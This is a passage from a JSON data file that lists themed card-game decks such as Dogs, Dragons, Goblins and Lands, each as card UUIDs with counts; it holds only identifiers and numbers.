"id": "2d22fdde-5590-4a4c-af2e-09711f4b5ffd",
"count": 1
},
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "a3bd4bce-8ab0-40b9-aad7-7d57a011bb0b",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "4caae1f4-dfb0-466f-9fa6-eb014767e3c8",
"count": 1
},
{
"id": "6ea1ee60-5644-4f78-913d-32c36065957f",
"count": 1
},
{
"id": "6d389a05-2e1a-471d-a865-1c3b68a03e01",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "2bcd008d-446e-41ba-a92e-871b9296fead",
"count": 7
}
],
"Dogs-1": [
{
"id": "f762546c-f5eb-420d-a8f7-c3566cd8f506",
"count": 1
},
{
"id": "c392a7e5-6ff5-4c2f-9590-f8811a724f44",
"count": 1
},
{
"id": "0291a964-1117-4fbd-9193-9719b273c348",
"count": 1
},
{
"id": "13f7a7ef-aa18-4738-97db-97e50ec3b801",
"count": 1
},
{
"id": "3f602ecc-c264-4f3e-adeb-d0186668653e",
"count": 1
},
{
"id": "5a129ff7-72f9-4171-902d-a1b49eebfb62",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "0da7c6dc-9325-4866-8c09-78c7021f8f17",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "efe75b38-c145-420e-9446-f2ac443ab3a5",
"count": 7
}
],
"Dogs-2": [
{
"id": "f762546c-f5eb-420d-a8f7-c3566cd8f506",
"count": 1
},
{
"id": "c392a7e5-6ff5-4c2f-9590-f8811a724f44",
"count": 1
},
{
"id": "0291a964-1117-4fbd-9193-9719b273c348",
"count": 1
},
{
"id": "6afead32-3542-44c4-82d6-b6a81beb9f90",
"count": 1
},
{
"id": "13f7a7ef-aa18-4738-97db-97e50ec3b801",
"count": 1
},
{
"id": "3f602ecc-c264-4f3e-adeb-d0186668653e",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "7df3cd89-02c9-4a1c-9a8a-d17a0b1030c9",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "0da7c6dc-9325-4866-8c09-78c7021f8f17",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "efe75b38-c145-420e-9446-f2ac443ab3a5",
"count": 7
}
],
"Dragons-1": [
{
"id": "2e9fa21a-a92e-4bcd-84fe-a7aa159fd0eb",
"count": 1
},
{
"id": "4ca8335b-21b1-40bc-970a-480e74874d03",
"count": 1
},
{
"id": "c5d3a18c-d030-494d-b7b1-4d1d1e27fbbf",
"count": 1
},
{
"id": "7bf663d3-850b-4a24-8e4b-08311adf4ed0",
"count": 1
},
{
"id": "017f94bc-f7f0-4eed-9ca0-392872405f32",
"count": 1
},
{
"id": "495c0dbf-1671-40f9-809c-98ef6d588512",
"count": 1
},
{
"id": "ac35ea21-fef4-4000-9b22-c8d07420827b",
"count": 1
},
{
"id": "d8a0ec06-7c48-4334-ac50-c249e7e91dbe",
"count": 1
},
{
"id": "f4af156d-0fbf-4a4e-b0c1-db7e95be4903",
"count": 1
},
{
"id": "102740d0-ca74-460d-af30-c71bddad87c4",
"count": 1
},
{
"id": "cdb5eab0-5397-4c00-8cef-7d3baf38a171",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "1b8d1535-68e7-4ca0-aa71-fc7fc63090fc",
"count": 8
}
],
"Dragons-2": [
{
"id": "d8e5f3d8-c468-412c-a32b-92c5d8fc1e14",
"count": 1
},
{
"id": "c5d3a18c-d030-494d-b7b1-4d1d1e27fbbf",
"count": 1
},
{
"id": "2ce76e86-39f3-4ebf-b550-88ea7f23a91f",
"count": 1
},
{
"id": "333228c5-af16-4ebd-acfc-3776b21ef044",
"count": 1
},
{
"id": "7bf663d3-850b-4a24-8e4b-08311adf4ed0",
"count": 1
},
{
"id": "9460e3c6-e745-41d3-8e17-0b92fb126a16",
"count": 1
},
{
"id": "017f94bc-f7f0-4eed-9ca0-392872405f32",
"count": 1
},
{
"id": "495c0dbf-1671-40f9-809c-98ef6d588512",
"count": 1
},
{
"id": "d8a0ec06-7c48-4334-ac50-c249e7e91dbe",
"count": 1
},
{
"id": "47daba07-1f1e-48e1-a500-ef94d0a3b327",
"count": 1
},
{
"id": "cdb5eab0-5397-4c00-8cef-7d3baf38a171",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "1b8d1535-68e7-4ca0-aa71-fc7fc63090fc",
"count": 8
}
],
"Elves-1": [
{
"id": "44afd414-cc69-4888-ba12-7ea87e60b1f7",
"count": 1
},
{
"id": "ffc63793-9bf9-4c69-8f6d-74484bb40fda",
"count": 1
},
{
"id": "d95d4f15-613c-42f1-a49b-f4f604e69feb",
"count": 1
},
{
"id": "23680a1a-7c8d-4ea0-a62c-a302f07b6ed5",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "02cc1d52-04bd-4546-a20f-d2993654c830",
"count": 1
},
{
"id": "1776f5b4-1292-460f-9719-e1b603cee46c",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "6da62557-9783-4e6c-9b5f-2b77dbf96909",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "bba661af-c4a8-4230-830e-a9ee22b25d6b",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "9c301150-16a8-4ce3-818c-16d6fb0df1b7",
"count": 7
}
],
"Elves-2": [
{
"id": "0ee4a931-5d61-49ba-affc-f022263938ca",
"count": 1
},
{
"id": "d95d4f15-613c-42f1-a49b-f4f604e69feb",
"count": 1
},
{
"id": "58b3bd44-3b01-4507-b9be-ab94601ea736",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "02cc1d52-04bd-4546-a20f-d2993654c830",
"count": 1
},
{
"id": "1776f5b4-1292-460f-9719-e1b603cee46c",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "f61eae36-9c4a-4d72-9431-6cac34dbb527",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "6da62557-9783-4e6c-9b5f-2b77dbf96909",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "bba661af-c4a8-4230-830e-a9ee22b25d6b",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "9c301150-16a8-4ce3-818c-16d6fb0df1b7",
"count": 7
}
],
"Enchanted-1": [
{
"id": "9c977c67-b0c0-40b0-b129-28de094aaf40",
"count": 1
},
{
"id": "2f060a74-dd75-4625-8842-27cb13a279e6",
"count": 1
},
{
"id": "2f81d2a0-5301-4cae-ac83-ad51647146e3",
"count": 1
},
{
"id": "59813c47-e779-404d-8a1c-70ea29bc7023",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "c3de35fd-425d-46b8-bc7d-c2f05d86858d",
"count": 1
},
{
"id": "207b7c60-ecf0-4661-8022-1e1714237e9f",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "aa4004b7-89b6-43f5-8d6e-13db1b08f3b8",
"count": 1
},
{
"id": "f5ba5d4b-5dbb-43d6-8f44-a2f80944df98",
"count": 1
},
{
"id": "c6f463b5-188f-4ecc-8cbf-0f200515bb09",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "999d82f8-6c64-4b6a-a8ac-fbc48dd1750c",
"count": 7
}
],
"Enchanted-2": [
{
"id": "8ea009c1-505e-4307-b8f3-2d37e36507a6",
"count": 1
},
{
"id": "2f060a74-dd75-4625-8842-27cb13a279e6",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "db17f25a-32d1-469b-bb5f-f1761e227990",
"count": 1
},
{
"id": "5cd3287d-e4d8-4670-a2dd-b683055ae4b9",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "136dfcf5-130a-4d75-9785-a090215a29b1",
"count": 1
},
{
"id": "207b7c60-ecf0-4661-8022-1e1714237e9f",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "aa4004b7-89b6-43f5-8d6e-13db1b08f3b8",
"count": 1
},
{
"id": "f5ba5d4b-5dbb-43d6-8f44-a2f80944df98",
"count": 1
},
{
"id": "c6f463b5-188f-4ecc-8cbf-0f200515bb09",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "999d82f8-6c64-4b6a-a8ac-fbc48dd1750c",
"count": 7
}
],
"Feathered Friends-1": [
{
"id": "c5b57247-81cc-44ec-b5a9-0702111a98a8",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "ddbcb165-0a60-493a-8cbb-ba8b36c527da",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "b17da4d0-f9fd-43af-85fc-ede9fa3962bf",
"count": 1
},
{
"id": "58e84a4a-034f-4f55-a827-e62f2b61f091",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Feathered Friends-2": [
{
"id": "c5b57247-81cc-44ec-b5a9-0702111a98a8",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "ddbcb165-0a60-493a-8cbb-ba8b36c527da",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "e8cca776-b0e4-4cd2-815f-36c1f86cf497",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "7acd58e4-7dc7-4ca0-8750-2558ff97b5da",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Feathered Friends-3": [
{
"id": "b7ab81d4-aaf7-4c72-9651-5e1482126928",
"count": 1
},
{
"id": "c5b57247-81cc-44ec-b5a9-0702111a98a8",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "457eb507-bbbf-4064-bdb0-cfeefe2195df",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Feathered Friends-4": [
{
"id": "042b0148-5821-4105-9cda-a0e405eb8bee",
"count": 1
},
{
"id": "a9e8eb41-3800-4553-843b-ec27a44e8d55",
"count": 1
},
{
"id": "46666fba-d4a7-4687-8747-a42e4c6d853e",
"count": 1
},
{
"id": "600d3517-e370-47ae-ac4f-c7ef8995a89c",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "d2e3b99c-e48e-4f4d-ba7a-e9218137b432",
"count": 1
},
{
"id": "dd39dd28-1dc2-46a5-a3cf-9b5d267e16d6",
"count": 1
},
{
"id": "f234999b-54e9-40f5-a537-7d6ce169c710",
"count": 1
},
{
"id": "a94f356d-4714-4500-8fb0-1ac68ec5c1cf",
"count": 1
},
{
"id": "aae001aa-10a0-482a-86fe-bf6ca7fc0866",
"count": 1
},
{
"id": "58e84a4a-034f-4f55-a827-e62f2b61f091",
"count": 1
},
{
"id": "ec7b4430-95c0-424b-a365-4ae467bb303d",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "25d96d9e-c6c2-4c51-ac57-b63dee0cf27a",
"count": 7
}
],
"Garruk": [
{
"id": "05f13bda-9157-437d-b58b-20d34d03fc49",
"count": 1
},
{
"id": "6649d5e9-22fb-4134-a4d9-ee05e6668f94",
"count": 1
},
{
"id": "288b056a-ea80-4fdc-990d-0ee1e9a7bf64",
"count": 1
},
{
"id": "3928bbce-87b7-4b28-9af4-20362935c909",
"count": 1
},
{
"id": "9e0fa0b6-5f3f-4669-84e8-2c38c9593d88",
"count": 1
},
{
"id": "20471a3b-90f9-4463-9b43-fc7b9b28f5d1",
"count": 1
},
{
"id": "93a56610-482b-4ddf-88e1-e4a2edf4fa0f",
"count": 1
},
{
"id": "af2fdbec-bca2-4af5-9c2a-28b0b35b18a3",
"count": 1
},
{
"id": "c12cf74d-aad9-41d8-959e-66557c39204d",
"count": 1
},
{
"id": "02392840-f0c4-462e-84ce-9a7cdd9f5efb",
"count": 1
},
{
"id": "7c08c80f-f27c-4e3a-b048-143aea740096",
"count": 1
},
{
"id": "71a4860a-8bb6-45c0-b00a-b4a42da33ab9",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "b6e049ae-bb12-41af-bbe4-ceded30bad67",
"count": 7
}
],
"Goblins-1": [
{
"id": "a4a514b9-8a67-47aa-8218-8d6fe8040128",
"count": 1
},
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "2c716d10-2130-43b7-a939-349d437e1091",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "b4c8e3b3-c8bb-415d-a19f-45ec679108ee",
"count": 1
},
{
"id": "a1214fc4-26ac-4a57-b894-6fd634d4d4fd",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Goblins-2": [
{
"id": "faca827d-0b35-48d7-acd6-13ecacc32b82",
"count": 1
},
{
"id": "a4a514b9-8a67-47aa-8218-8d6fe8040128",
"count": 1
},
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "2c716d10-2130-43b7-a939-349d437e1091",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "f19b4a80-41e1-4c5f-869a-682f08543f12",
"count": 1
},
{
"id": "a1214fc4-26ac-4a57-b894-6fd634d4d4fd",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Goblins-3": [
{
"id": "a4a514b9-8a67-47aa-8218-8d6fe8040128",
"count": 1
},
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "89fcc35b-76fa-4408-8620-a1e11b2caf1f",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "5b629eb0-0e84-4eaf-bbc3-ec85ae17a8a7",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "b4c8e3b3-c8bb-415d-a19f-45ec679108ee",
"count": 1
},
{
"id": "59fa8e8d-bcb8-47bf-b71a-df11c8d0f2c9",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Goblins-4": [
{
"id": "3d6de3a7-30a7-49d7-8e39-494355c6edae",
"count": 1
},
{
"id": "fa4bf664-3b92-4598-b905-2bc090958c8b",
"count": 1
},
{
"id": "c742d940-1a8d-487a-a787-2ad96a96ef1f",
"count": 1
},
{
"id": "f32d7ce5-078b-40ff-8ecb-34309a0e3719",
"count": 1
},
{
"id": "f70a98be-e7d9-4cb7-a7ed-de2bf593170d",
"count": 1
},
{
"id": "cd9fec9d-23c8-4d35-97c1-9499527198fb",
"count": 1
},
{
"id": "2164e358-cbb4-4c3a-aea2-48f1891757df",
"count": 1
},
{
"id": "f19b4a80-41e1-4c5f-869a-682f08543f12",
"count": 1
},
{
"id": "a1214fc4-26ac-4a57-b894-6fd634d4d4fd",
"count": 1
},
{
"id": "660e7067-9f1d-4e2c-bd12-0ad752a3cec8",
"count": 1
},
{
"id": "34d6a2d0-d855-4b87-9f4c-58dda0b81c82",
"count": 1
},
{
"id": "8669513f-4fc2-47ee-a919-f4b538be2385",
"count": 1
},
{
"id": "15481459-3703-4185-ad27-105d95691e9d",
"count": 1
},
{
"id": "37d0d802-2bd2-444f-81e0-4cc2f8ece38f",
"count": 7
}
],
"Heavily Armored-1": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "12f43272-6681-41dd-8bfd-d18cc68171c1",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "73148b3b-73d3-4f57-8b67-1e91fbe112b9",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "fbb70e7b-2a68-436e-96a4-32a88fb87da0",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Heavily Armored-2": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "12f43272-6681-41dd-8bfd-d18cc68171c1",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "c7bac081-a946-4278-90f0-c0f262b7abf2",
"count": 1
},
{
"id": "77238879-6dc7-46ff-8354-89e60c2a04e9",
"count": 1
},
{
"id": "d6467d96-e43a-4b1e-b6ce-578d991077b5",
"count": 1
},
{
"id": "fbb70e7b-2a68-436e-96a4-32a88fb87da0",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Heavily Armored-3": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "1b24d60d-bd80-4363-829c-a9d7f8c61fdf",
"count": 1
},
{
"id": "12f43272-6681-41dd-8bfd-d18cc68171c1",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "c7bac081-a946-4278-90f0-c0f262b7abf2",
"count": 1
},
{
"id": "352c4997-2b96-45da-a4e1-70a86453c6fa",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Heavily Armored-4": [
{
"id": "08d1dd97-2675-4953-ab95-d47d23abfe05",
"count": 1
},
{
"id": "5104d4fe-4c20-4106-b405-a2b35140c942",
"count": 1
},
{
"id": "64cfd373-148d-4073-8867-3d9ccae20fd1",
"count": 1
},
{
"id": "2002d263-3fe0-481a-b389-84e281b009d7",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "7a0ffa89-e6ee-466c-8edc-dd24c8b52e80",
"count": 1
},
{
"id": "f8c10c77-1446-4581-9587-dc2860fe78fe",
"count": 1
},
{
"id": "3b43d7bc-173c-41eb-bba9-a9d94dcfc5fa",
"count": 1
},
{
"id": "ab4eb490-acd0-4162-8e8a-7e7ff003d0f3",
"count": 1
},
{
"id": "504698a9-1512-4288-b5ef-392d41ebcd05",
"count": 1
},
{
"id": "a90c1ad0-83bd-471c-8d4c-e65bc2abaa18",
"count": 1
},
{
"id": "fefef556-dd3c-49b9-a6f5-8b86af64416e",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "a334360b-2943-4442-8557-e0a5efd272b7",
"count": 7
}
],
"Lands-1": [
{
"id": "7de98df4-9552-4ba6-a324-1669dc077d4c",
"count": 1
},
{
"id": "70180e04-1453-43dc-9bbb-ab0d6291a8b5",
"count": 1
},
{
"id": "45bc8745-9aaf-4b3c-922f-5a577324bb1f",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "e36a5be0-a730-4cb7-9d1e-6ae84b5bc872",
"count": 1
},
{
"id": "0700d1c1-faab-4a1a-b55d-a2fa4582a2b4",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "57b819f4-cabf-4a31-86f4-3213deb6b719",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "d00cb59d-de35-45b2-a7f8-f8c1e821f6ee",
"count": 1
},
{
"id": "180aa3d6-8475-4c98-a140-af736a9c135e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "88adbda4-7818-4888-a908-de6073bd0152",
"count": 7
}
],
"Lands-2": [
{
"id": "7de98df4-9552-4ba6-a324-1669dc077d4c",
"count": 1
},
{
"id": "70180e04-1453-43dc-9bbb-ab0d6291a8b5",
"count": 1
},
{
"id": "45bc8745-9aaf-4b3c-922f-5a577324bb1f",
"count": 1
},
{
"id": "1858ca48-b34c-4b9f-bd58-e85e75d94508",
"count": 1
},
{
"id": "5de097e5-e960-4404-a370-defe93ce892f",
"count": 1
},
{
"id": "f2799310-c77a-47b2-b1a5-50c029600020",
"count": 1
},
{
"id": "e36a5be0-a730-4cb7-9d1e-6ae84b5bc872",
"count": 1
},
{
"id": "6b146ba7-591c-4553-b250-0a6eed24f0b5",
"count": 1
},
{
"id": "a2e49925-a4ab-4960-ad83-20583dcd2c2c",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "57b819f4-cabf-4a31-86f4-3213deb6b719",
"count": 1
},
{
"id": "31233339-c5ec-40fb-badd-94ef7f0ff7c0",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "88adbda4-7818-4888-a908-de6073bd0152",
"count": 7
}
],
"Legion-1": [
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "fb4733e6-6fe2-4460-ac9f-82feb583d790",
"count": 1
},
{
"id": "2f81d2a0-5301-4cae-ac83-ad51647146e3",
"count": 1
},
{
"id": "31a500e6-01f5-4a3a-8839-68b9b515e919",
"count": 1
},
{
"id": "5a129ff7-72f9-4171-902d-a1b49eebfb62",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "e9822b57-8e42-4158-981d-f0b0b0646fc9",
"count": 1
},
{
"id": "59d40386-6ea6-4b77-8c61-2a9a16a88a01",
"count": 1
},
{
"id": "f552f9b6-0a60-44d8-985e-249617e04866",
"count": 1
},
{
"id": "c2e6fdc0-bdd4-4bba-b8f1-bbc8dfad038e",
"count": 1
},
{
"id": "032f6c5a-8d88-4a55-a54b-28df42d801e1",
"count": 1
},
{
"id": "ff80029e-650e-469d-8393-0edf7d9cd695",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "27d283ba-9d88-45d2-80d3-7e4fffea6d22",
"count": 7
}
],
"Legion-2": [
{
